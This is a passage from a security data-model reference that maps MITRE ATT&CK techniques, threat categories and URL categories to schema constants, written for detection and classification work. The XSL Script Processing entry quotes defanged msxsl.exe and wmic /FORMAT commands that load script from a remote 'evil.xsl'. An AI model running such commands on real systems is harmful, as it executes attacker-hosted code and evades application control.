before and after execution of a sleep function.(Citation: ISACA Malware Tricks) https://attack.mitre.org/
techniques/T1497/003

T1497.002 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_USER_ACTIVITY_BASED_CHECKS Adversaries may employ various user activity checks to detect and avoid virtualization and analysis
environments. This may include changing behaviors based on the results of checks for the presence of
artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME,
they may alter their malware to disengage from the victim or conceal the core functions of the implant. They
may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use
the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may search for user activity on the host based on variables such as the speed/frequency of
mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or
number of files in common directories such as home or the desktop. Other methods may rely on specific
user interaction with the system before the malicious code is activated, such as waiting for a document to
close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on
an embedded image to activate.(Citation: FireEye FIN7 April 2017) https://attack.mitre.org/techniques/
T1497/002

T1600 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION Adversaries may compromise a network device’s encryption capability in order to bypass encryption that
would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption can be
used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized
disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a
plaintext message to ciphertext and can be computationally intensive to decipher without the associated
decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For
example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601),
[Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://
attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s
ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help
facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device
Attacks) https://attack.mitre.org/techniques/T1600

T1600.002 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION_DISABLE_CRYPTO_HARDWARE Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage
weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and
exfiltrating transmitted data. Many network devices such as routers, switches, and firewalls, perform
encryption on network traffic to secure transmission across networks. Often, these devices are equipped
with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well
as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the
dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/
T1601), forcing the use of software to perform encryption on general processors. This is typically used in
conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://
attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks) https://
attack.mitre.org/techniques/T1600/002

T1600.001 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION_REDUCE_KEY_SPACE Adversaries may reduce the level of effort required to decrypt data transmitted over the network by
reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key
size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to
just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt
the protected information without the key. Adversaries may modify the key size used and other encryption
parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/
T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/
T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks) https://
attack.mitre.org/techniques/T1600/001
 Original Mapped Description

T1102 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a
compromised system. Popular websites and social media acting as a mechanism for C2 may give a
significant amount of cover due to the likelihood that hosts within a network are already communicating with
them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it
easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption,
giving adversaries an added level of protection. Use of Web services may also protect back-end C2
infrastructure from discovery through malware binary analysis while also enabling operational resiliency
(since this infrastructure may be dynamically changed). https://attack.mitre.org/techniques/T1102

T1102.002 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_BIDIRECTIONAL_COMMUNICATION Adversaries may use an existing, legitimate external Web service as a means for sending commands to
and receiving output from a compromised system over the Web service channel. Compromised systems
may leverage popular websites and social media to host command and control (C2) instructions. Those
infected systems can then send the output from those commands back over that Web service channel. The
return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the
return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull
request to development project, updating a document hosted on a Web service, or by sending a Tweet.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover
due to the likelihood that hosts within a network are already communicating with them prior to a
compromise. Using common services, such as those offered by Google or Twitter, makes it easier for
adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving
adversaries an added level of protection. https://attack.mitre.org/techniques/T1102/002

T1102.001 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_DEAD_DROP_RESOLVER Adversaries may use an existing, legitimate external Web service to host information that points to
additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop
resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once
infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media
acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within
a network are already communicating with them prior to a compromise. Using common services, such as
those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service
providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of a
dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary
analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
https://attack.mitre.org/techniques/T1102/001

T1102.003 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_ONE_WAY_COMMUNICATION Adversaries may use an existing, legitimate external Web service as a means for sending commands to a
compromised system without receiving return output over the Web service channel. Compromised systems
may leverage popular websites and social media to host command and control (C2) instructions. Those
infected systems may opt to send the output from those commands back over a different C2 channel,
including to another distinct Web service. Alternatively, compromised systems may return no output at all in
cases where adversaries want to send instructions to systems and do not want a response. Popular
websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the
likelihood that hosts within a network are already communicating with them prior to a compromise. Using
common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in
expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added
level of protection. https://attack.mitre.org/techniques/T1102/003

T1047 XDM_CONST.MITRE_TECHNIQUE_WINDOWS_MANAGEMENT_INSTRUMENTATION Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and
payloads. WMI is an administration feature that provides a uniform environment to access Windows system
components. The WMI service enables both local and remote access, though the latter is facilitated by
[Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object
Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management]
(https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM
operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986
for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with
local and remote systems and use it as a means to execute various behaviors, such as gathering
information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation:
FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) https://attack.mitre.org/techniques/T1047

T1220 XDM_CONST.MITRE_TECHNIQUE_XSL_SCRIPT_PROCESSING Adversaries may bypass application control and obscure execution of code by embedding scripts inside
XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and
rendering of data within XML files. To support complex operations, the XSL standard includes support for
embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017) Adversaries may
abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to
[Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft
common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and
used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files.
(Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an
adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR
2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file
is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also
give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019) Command-line
examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019) *
msxsl.exe customers[.]xml script[.]xsl * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe
script[.]jpeg script[.]jpeg Another variation of this technique, dubbed “Squiblytwo”, involves using
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or
VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts
and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart,
leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management
Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.
(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation:
LOLBAS Wmic) * Local File: wmic process list /FORMAT:evil[.]xsl * Remote File: wmic os get /
FORMAT:”https[:]//example[.]com/evil[.]xsl” https://attack.mitre.org/techniques/T1220

3.30 | XDM_CONST.THREAT_CATEGORY
The threat's category, see https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-admin/threat-prevention/threat-signatures.html

Original Mapped Description

apk XDM_CONST.THREAT_CATEGORY_APK Malicious Android Application (APK) files.

dmg XDM_CONST.THREAT_CATEGORY_DMG Malicious Apple disk image (DMG) files, that are used with Mac OS X.

flash XDM_CONST.THREAT_CATEGORY_FLASH Adobe Flash applets and Flash content embedded in web pages.

java-class XDM_CONST.THREAT_CATEGORY_JAVA_CLASS Java applets (JAR/class file types).

macho XDM_CONST.THREAT_CATEGORY_MACHO Mach object files (Mach-O) are executables, libraries, and object code that are native to Mac OS X.

office XDM_CONST.THREAT_CATEGORY_OFFICE Microsoft Office files, including documents (DOC, DOCX, RTF), workbooks (XLS, XLSX), and PowerPoint presentations (PPT, PPTX).

openoffice XDM_CONST.THREAT_CATEGORY_OPENOFFICE Office Open XML (OOXML) 2007+ documents.

pdf XDM_CONST.THREAT_CATEGORY_PDF Portable Document Format (PDF) files.

 Original Mapped Description

pe XDM_CONST.THREAT_CATEGORY_PE Portable executable (PE) files can automatically execute on a Microsoft Windows system and should be only allowed when authorized. These files types include: Object code, Fonts (FONs), System files (SYS), Driver files (DRV),
Windows control panel items (CPLs), DLLs (dynamic-link libraries), OCXs (libraries for OLE custom controls, or ActiveX controls), SCRs (scripts that can be used to execute other files), Extensible Firmware Interface (EFI) files,
which run between an OS and firmware in order to facilitate, device updates and boot operations, Program information files (PIFs).

pkg XDM_CONST.THREAT_CATEGORY_PKG Apple software installer packages (PKGs), used with Mac OS X.

adware XDM_CONST.THREAT_CATEGORY_ADWARE Detects programs that display potentially unwanted advertisements. Some adware modifies browsers to highlight and hyperlink the most frequently searched keywords on web pages-these links redirect users to advertising websites.
Adware can also retrieve updates from a command-and-control (C2) server and install those updates in a browser or onto a client system. Newly-released protections in this category are rare.

autogen XDM_CONST.THREAT_CATEGORY_AUTOGEN These payload-based signatures detect command-and-control (C2) traffic and are automatically-generated. Importantly, autogen signatures can detect C2 traffic even when the C2 host is unknown or changes rapidly.

backdoor XDM_CONST.THREAT_CATEGORY_BACKDOOR Detects a program that allows an attacker to gain unauthorized remote access to a system.

botnet XDM_CONST.THREAT_CATEGORY_BOTNET Indicates botnet activity. A botnet is a network of malware-infected computers (“bots”) that an attacker controls. The attacker can centrally command every computer in a botnet to simultaneously carry out a coordinated action (like
launching a DoS attack, for example).

browser- XDM_CONST.THREAT_CATEGORY_BROWSER_HIJACK Detects a plugin or software that is modifying browser settings. A browser hijacker might take over auto search or track users’ web activity and send this information to a C2 server. Newly-released protections in this category are
hijack rare.

cryptominer XDM_CONST.THREAT_CATEGORY_CRYPTOMINER (Sometimes known as cryptojacking or miners) Detects the download attempt or network traffic generated from malicious programs designed to use computing resources to mine cryptocurrencies without the user's knowledge.
Cryptominer binaries are frequently delivered by a shell script downloader that attempts to determine system architecture and kill other miner processes on the system. Some miners execute within other processes, such as a web
browser rendering a malicious web page.

data-theft XDM_CONST.THREAT_CATEGORY_DATA_THEFT Detects a system sending information to a known C2 server. Newly-released protections in this category are rare.

dns XDM_CONST.THREAT_CATEGORY_DNS Detects DNS requests to connect to malicious domains. dns and dns-wildfire signatures detect the same malicious domains; however, dns signatures are included in the daily Antivirus content update and dns-wildfire signatures are
included in the WildFire updates that release protections every 5 minutes.

dns-security XDM_CONST.THREAT_CATEGORY_DNS_SECURITY Detects DNS requests to connect to malicious domains. dns-security includes signatures from dns and dns-wildfire in addition to the unique signatures generated by the DNS Security service.

dns-wildfire XDM_CONST.THREAT_CATEGORY_DNS_WILDFIRE Detects DNS requests to connect to malicious domains.dns and dns-wildfire signatures detect the same malicious domains; however, dns signatures are included in the daily Antivirus content update and dns-wildfire signatures are
included in the WildFire updates that release protections every 5 minutes.

downloader XDM_CONST.THREAT_CATEGORY_DOWNLOADER (Also known as droppers, stagers, or loaders) Detects programs that use an internet connection to connect to a remote server to download and execute malware on the compromised system. The most common use case is for a
downloader to be deployed as the culmination of stage one of a cyber attack, where the downloader’s fetched payload execution is considered second stage. Shell scripts (Bash, PowerShell, etc.), trojans, and malicious lure
documents (also known as maldocs) such as PDFs and Word files are common downloader types.

fraud XDM_CONST.THREAT_CATEGORY_FRAUD (Including form-jacking, phishing, and scams) Detects access to compromised websites that have been determined to be injected with malicious JavaScript code to collect sensitive user information. (for example, Name, address,
email, credit card number, CVV, expiration date) from payment forms that are captured on the checkout pages of e-commerce websites.

hacktool XDM_CONST.THREAT_CATEGORY_HACKTOOL Detects traffic generated by software tools that are used by malicious actors to conduct reconnaissance, attack or gain access to vulnerable systems, exfiltrate data, or create a command and control channel to surreptitiously control
a computer system without authorization. These programs are strongly associated with malware and cyber attacks. Hacking tools might be deployed in a benign manner when used in Red and Blue Team operations, penetration
tests, and R&D. The use or possession of these tools may be illegal in some countries, regardless of intent.

keylogger XDM_CONST.THREAT_CATEGORY_KEYLOGGER Detects programs that allow attackers to secretly track user activity, by logging keystrokes and capturing screenshots. Keyloggers use various C2 methods to periodically sends logs and reports to a predefined e-mail address or a
C2 server. Through keylogger surveillance, an attacker could retrieve credentials that would enable network access.

networm XDM_CONST.THREAT_CATEGORY_NETWORM Detects a program that self-replicates and spreads from system to system. Net-worms might use shared resources or leverage security failures to access target systems.

phishing-kit XDM_CONST.THREAT_CATEGORY_PHISHING_KIT Detects when a user attempts to connect to a phishing kit landing page (likely after receiving an email with a link to the malicious site). A phishing website tricks users into submitting credentials that an attacker can steal to gain
access to the network. in addition to blocking access to phishing kit landing pages, enable Multi-Factor Authentication and Prevent Credential Phishing to prevent phishing attacks at all stages.

post- XDM_CONST.THREAT_CATEGORY_POST_EXPLOITATION Detects activity that indicates the post-exploitation phase of an attack, where an attacker attempts to assess the value of a compromised system. This might include evaluating the sensitivity of the data stored on the system, and the
exploitation system’s usefulness in further compromising the network.

webshell XDM_CONST.THREAT_CATEGORY_WEBSHELL Detects web shells and web shell traffic, including implant detection and command and control interaction. Web shells must first be implanted by a malicious actor onto the compromised host, most often targeting a web server or
framework. Subsequent communication with the web shell file frequently enables a malicious actor to establish a foothold in the system, conduct service and network enumeration, data exfiltration, and remote code execution in the
context of the web server user. The most common web shell types are PHP, .NET, and Perl markup scripts. Attackers can also use web shell-infected web servers (the web servers can be both internet-facing or internal systems) to
target other internal systems.

spyware XDM_CONST.THREAT_CATEGORY_SPYWARE Detect outbound C2 communication. These signatures are either auto-generated or are manually created by Palo Alto Networks researchers. Spyware and autogen signatures both detect outbound C2 communication; however,
autogen signatures are payload-based and can uniquely detect C2 communications with C2 hosts that are unknown or change rapidly.

brute force XDM_CONST.THREAT_CATEGORY_BRUTE_FORCE A brute-force signature detects multiple occurrences of a condition in a particular time frame. While the activity in isolation might be benign, the brute-force signature indicates that the frequency and rate at which the activity occurred
is suspect. For example, a single FTP login failure does not indicate malicious activity. However, many failed FTP logins in a short period likely indicate an attacker attempting password combinations to access an FTP server. You
can tune the action and trigger conditions for brute force signatures.

code XDM_CONST.THREAT_CATEGORY_CODE_EXECUTION Detects a code execution vulnerability that an attacker can leverage to run code on a system with the privileges of the logged-in user.
execution

code- XDM_CONST.THREAT_CATEGORY_CODE_OBFUSCATION Detects code that has been transformed to conceal certain data while retaining its function. Obfuscated code is difficult or impossible to read, so it’s not apparent what commands the code is executing or with which programs its
obfuscation designed to interact. Most commonly, malicious actors obfuscate code to conceal malware. More rarely, legitimate developers might obfuscate code to protect privacy, intellectual property, or to improve user experience. For example,
certain types of obfuscation (like minification) reduce file size, which decreases website load times and bandwidth usage.

dos XDM_CONST.THREAT_CATEGORY_DOS Detects a denial-of-service (DoS) attack, where an attacker attempts to render a targeted system unavailable, temporarily disrupting the system and dependent applications and services. To perform a DoS attack, an attacker might
flood a targeted system with traffic or send information that causes it to fail. DoS attacks deprive legitimate users (like employees, members, and account holders) of the service or resource to which they expect access.

exploit-kit XDM_CONST.THREAT_CATEGORY_EXPLOIT_KIT Detects an exploit kit landing page. Exploit kit landing pages often contain several exploits that target one or many common vulnerabilities and exposures (CVEs), for multiple browsers and plugins. Because the targeted CVEs
change quickly, exploit-kit signatures trigger based on the exploit kit landing page, and not the CVEs. When a user visits a website with an exploit kit, the exploit kit scans for the targeted CVEs and attempts to silently deliver a
malicious payload to the victim’s computer.

info-leak XDM_CONST.THREAT_CATEGORY_INFO_LEAK Detects a software vulnerability that an attacker could exploit to steal sensitive or proprietary information. Often, an info-leak might exist because comprehensive checks do not exist to guard the data, and attackers can exploit info-
leaks by sending crafted requests.

insecure- XDM_CONST.THREAT_CATEGORY_INSECURE_CREDENTIALS Detects the use of weak, compromised, and manufacturer default passwords for software, network appliances, and IoT devices.
credentials

overflow XDM_CONST.THREAT_CATEGORY_OVERFLOW Detects an overflow vulnerability, where a lack of proper checks on requests could be exploited by an attacker. A successful attack could lead to remote code execution with the privileges of the application, server or operating
system.

phishing XDM_CONST.THREAT_CATEGORY_PHISHING Detects when a user attempts to connect to a phishing kit landing page (likely after receiving an email with a link to the malicious site). A phishing website tricks users into submitting credentials that an attacker can steal to gain
access to the network. In addition to blocking access to phishing kit landing pages, enable Multi-Factor Authentication and Prevent Credential Phishing to prevent phishing attacks at all stages.
 Original Mapped Description

protocol- XDM_CONST.THREAT_CATEGORY_PROTOCOL_ANOMALY Detects protocol anomalies, where a protocol behavior deviates from standard and compliant usage. For example, a malformed packet, poorly-written application, or an application running on a non-standard port would all be
anomaly considered protocol anomalies, and could be used as evasion tools. It is a best practice to block protocol anomalies of any severity.

sql-injection XDM_CONST.THREAT_CATEGORY_SQL_INJECTION Detects a common hacking technique where an attacker inserts SQL queries into an application’s requests, in order to read from or modify a database. This type of technique is often used on websites that do not comprehensively
sanitize user input.

3.31 | XDM_CONST.URL_CATEGORY
URL category. See https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000Cm5hCAC.

Original Mapped Description

1 XDM_CONST.URL_CATEGORY_ABORTION Sites that pertain to information or groups in favor of or against abortion, details regarding abortion procedures, help or support forums for or against abortion, or sites that provide information regarding the
consequences/effects of pursuing (or not) an abortion.

2 XDM_CONST.URL_CATEGORY_ABUSED_DRUGS Sites that promote the abuse of both legal and illegal drugs, use and sale of drug related paraphernalia, manufacturing and/or selling of drugs.

3 XDM_CONST.URL_CATEGORY_ADULT Sexually explicit material, media (including language), art, and/or products, online groups or forums that are sexually explicit in nature. Sites that promote adult services such as video/telephone conferencing, escort
services, strip clubs, etc. Anything containing adult content (even if it's games or comics) will be categorized as adult.

4 XDM_CONST.URL_CATEGORY_ALCOHOL_AND_TOBACCO Sites that pertain to the sale, manufacturing, or use of alcohol and/or tobacco products and related paraphernalia. Includes sites related to electronic cigarettes.

5 XDM_CONST.URL_CATEGORY_AUCTIONS Sites that promote the sale of goods between individuals.

6 XDM_CONST.URL_CATEGORY_BUSINESS_AND_ECONOMY Marketing, management, economics, and sites relating to entrepreneurship or running a business. Includes advertising and marketing firms. Should not include corporate websites as they should be categorized with
their technology. Also shipping sites, such as fedex.com and ups.com.

7 XDM_CONST.URL_CATEGORY_COMMAND_AND_CONTROL Command-and-control URLs and domains used by malware and/or compromised systems to surreptitiously communicate with an attacker's remote server to receive malicious commands or exfiltrate data

8 XDM_CONST.URL_CATEGORY_COMPUTER_AND_INTERNET_INFO General information regarding computers and the internet. Should include sites about computer science, engineering, hardware, software, security, programming, etc. Programming may have some overlap with
reference, but the main category should remain computer and internet info.

9 XDM_CONST.URL_CATEGORY_CONTENT_DELIVERY_NETWORKS Sites whose primary focus is delivering content to 3rd parties such as advertisements, media, files, etc. Also includes image servers.

10 XDM_CONST.URL_CATEGORY_COPYRIGHT_INFRINGEMENT Domains with illegal content, such as content that allows illegal download of software or other intellectual property, which poses a potential liability risk. This category was introduced to enable adherence to child
protection laws required in the education industry as well as laws in countries that require internet providers to prevent users from sharing copyrighted material through their service.

11 XDM_CONST.URL_CATEGORY_CRYPTOCURRENCY Websites that promote cryptocurrencies, crypto mining websites (but not embedded crypto miners), cryptocurrency exchanges and vendors, and websites that manage cryptocurrency wallets and ledgers. This
category does not include traditional financial services websites that reference cryptocurrencies, websites that explain and describe how cryptocurrencies and blockchains work, or websites that contain embedded
crypto currency miners (grayware).

12 XDM_CONST.URL_CATEGORY_DATING Websites offering online dating services, advice, and other personal ads

13 XDM_CONST.URL_CATEGORY_DYNAMIC_DNS Hosts and domain names for systems with dynamically assigned IP addresses and which are oftentimes used to deliver malware payloads or C2 traffic. Also, dynamic DNS domains do not go through the same
vetting process as domains that are registered by a reputable domain registration company, and are therefore less trustworthy.

14 XDM_CONST.URL_CATEGORY_EDUCATIONAL_INSTITUTIONS Official websites for schools, colleges, universities, school districts, online classes, and other academic institutions. These refer to larger, established educational institutions such as elementary schools, high schools,
universities, etc. Tutoring academies can go here as well.

15 XDM_CONST.URL_CATEGORY_ENTERTAINMENT_AND_ARTS Sites for movies, television, radio, videos, programming guides/tools, comics, performing arts, museums, art galleries, or libraries. Includes sites for entertainment, celebrity and industry news.

16 XDM_CONST.URL_CATEGORY_EXTREMISM Websites promoting terrorism, racism, fascism, or other extremist views discriminating against people or groups of different ethnic backgrounds, religions or other beliefs. This category was introduced to enable
adherence to child protection laws required in the education industry. In some regions, laws and regulations may prohibit allowing access to extremist sites, and allowing access may pose a liability risk.

17 XDM_CONST.URL_CATEGORY_FINANCIAL_SERVICES Websites pertaining to personal financial information or advice, such as online banking, loans, mortgages, debt management, credit card companies, and insurance companies. Does not include sites relating to stock
markets, brokerages or trading services.Includes sites for foreign currency exchange. Includes sites for foreign currency exchange.

18 XDM_CONST.URL_CATEGORY_GAMBLING Lottery or gambling websites that facilitate the exchange of real and/or virtual money. Related websites that provide information, tutorials or advice regarding gambling, including betting odds and pools. Corporate
websites for hotels and casinos that do not enable gambling are categorized under Travel.

19 XDM_CONST.URL_CATEGORY_GAMES Sites that provide online play or download of video and/or computer games, game reviews, tips, or cheats, as well as instructional sites for non-electronic games, sale/trade of board games, or related publications/
media. Includes sites that support or host online sweepstakes and/or giveaways.

20 XDM_CONST.URL_CATEGORY_GOVERNMENT Official websites for local, state, and national governments, as well as related agencies, services, or laws.

21 XDM_CONST.URL_CATEGORY_GRAYWARE Web content that does not pose a direct security threat but that display other obtrusive behavior and tempt the end user to grant remote access or perform other unauthorized actions. Grayware includes illegal
activities, criminal activities, rogueware, adware, and other unwanted or unsolicited applications, such as embedded crypto miners, clickjacking or hijackers that change the elements of the browser. Typosquatting
domains that do not exhibit maliciousness and are not owned by the targeted domain will be categorized as grayware.

22 XDM_CONST.URL_CATEGORY_HACKING Sites relating to the illegal or questionable access to or the use of communications equipment/software. Development and distribution of programs, how-to-advice and/or tips that may result in the compromise of
networks and systems. Also includes sites that facilitate the bypass of licensing and digital rights systems.

23 XDM_CONST.URL_CATEGORY_HEALTH_AND_MEDICINE Sites containing information regarding general health information, issues, and traditional and non-traditional tips, remedies, and treatments. Also includes sites for various medical specialties, practices and facilities
(such as gyms and fitness clubs) as well as professionals. Sites relating to medical insurance and cosmetic surgery are also included.

24 XDM_CONST.URL_CATEGORY_HOME_AND_GARDEN Information, products, and services regarding home repair and maintenance, architecture, design, construction, décor, and gardening.

25 XDM_CONST.URL_CATEGORY_HUNTING_AND_FISHING Hunting and fishing tips, instructions, sale of related equipment and paraphernalia.

26 XDM_CONST.URL_CATEGORY_INSUFFICIENT_CONTENT Websites and services that present test pages, no content, provide API access not intended for end-user display or require authentication without displaying any other content suggesting a different categorization.
Should not include websites providing remote access, such as web based VPN solutions, web based email services or identified credential phishing pages.

27 XDM_CONST.URL_CATEGORY_INTERNET_COMMUNICATIONS_AND_TELEPHONY Sites that support or provide services for video chatting, instant messaging, or telephony capabilities.

28 XDM_CONST.URL_CATEGORY_INTERNET_PORTALS Sites that serve as a starting point for users, usually by aggregating a broad set of content and topics.

29 XDM_CONST.URL_CATEGORY_JOB_SEARCH Sites that provide job listings and employer reviews, interview advice and tips, or related services for both employers and prospective candidates.
Original Mapped Description

30 XDM_CONST.URL_CATEGORY_LEGAL Information, analysis or advice regarding the law, legal services, legal firms, or other legal related issues.

31 XDM_CONST.URL_CATEGORY_MALWARE Sites known to host malware or used for command and control (C2) traffic. May also exhibit Exploit Kits.

32 XDM_CONST.URL_CATEGORY_MILITARY Information or commentary regarding military branches, recruitment, current or past operations, or any related paraphernalia.

33 XDM_CONST.URL_CATEGORY_MOTOR_VEHICLES Information relating to reviews, sales and trading, modifications, parts, and other related discussions for automobiles, motorcycles, boats, trucks and RVs.

34 XDM_CONST.URL_CATEGORY_MUSIC Music sales, distribution, or information. Includes websites for music artists, groups, labels, events, lyrics, and other information regarding the music business. Does not include streaming music.

35 XDM_CONST.URL_CATEGORY_NEWLY_REGISTERED_DOMAIN Newly registered domains are often generated purposely or by domain generation algorithms and used for malicious activity.

36 XDM_CONST.URL_CATEGORY_NEWS Online publications, newswire services, and other websites that aggregate current events, weather, or other contemporary issues. Includes newspapers, radio stations, magazines, and podcasts.

37 XDM_CONST.URL_CATEGORY_NOT_RESOLVED Indicates that the website was not found in the local URL filtering database and the firewall was unable to connect to the cloud database to check the category. When a URL category lookup is performed, the firewall
first checks the dataplane cache for the URL, if no match is found, it will then check the management plane cache, and if no match is found there, it queries the URL database in the cloud. When deciding on what
action to take for traffic that is categorized as not-resolved, be aware that setting the action to block may be very disruptive to users.

38 XDM_CONST.URL_CATEGORY_NUDITY Sites that contain nude or seminude depictions of the human body, regardless of context or intent, such as artwork. Includes nudist or naturist sites containing images of participants.

39 XDM_CONST.URL_CATEGORY_ONLINE_STORAGE_AND_BACKUP Websites that provide online storage of files for free and as a service.

40 XDM_CONST.URL_CATEGORY_PARKED Domains registered by individuals, oftentimes later found to be used for credential phishing. These domains may be similar to legitimate domains, for example, pal0alto0netw0rks.com, with the intent of phishing for
credentials or personal identify information. Or, they may be domains that an individual purchases rights to in hopes that it may be valuable someday, such as panw.net.

41 XDM_CONST.URL_CATEGORY_PEER_TO_PEER Sites that provide access to or clients for peer-to-peer sharing of torrents, download programs, media files, or other software applications. This is primarily for those sites that provide bittorrent download capabilities.
Does not include shareware or freeware sites.

42 XDM_CONST.URL_CATEGORY_PERSONAL_SITES_AND_BLOGS Personal websites and blogs by individuals or groups. Should try to first categorize based on content. For example, if someone has a blog just about cars, then the site should be categorized under "motor vehicles".
However, if the site is a pure blog, then it should remain under "personal sites and blogs".

43 XDM_CONST.URL_CATEGORY_PHILOSOPHY_AND_POLITICAL_ADVOCACY Sites containing information, viewpoints or campaigns regarding philosophical or political views.

44 XDM_CONST.URL_CATEGORY_PHISHING Web content that covertly attempts to fool the user in order to harvest information, including login credentials, credit card information – voluntarily or involuntarily, account numbers, PINs, and any information
considered to be personally identifiable information (PII) from victims via social engineering techniques. Technical support scams and scareware is also included as phishing.

45 XDM_CONST.URL_CATEGORY_PRIVATE_IP_ADDRESSES This category includes IP addresses defined in RFC 1918, Address Allocation for Private Intranets? It also includes domains not registered with the public DNS system ( *.local and *.onion).

46 XDM_CONST.URL_CATEGORY_PROXY_AVOIDANCE_AND_ANONYMIZERS URLs and services often used to bypass content filtering products.

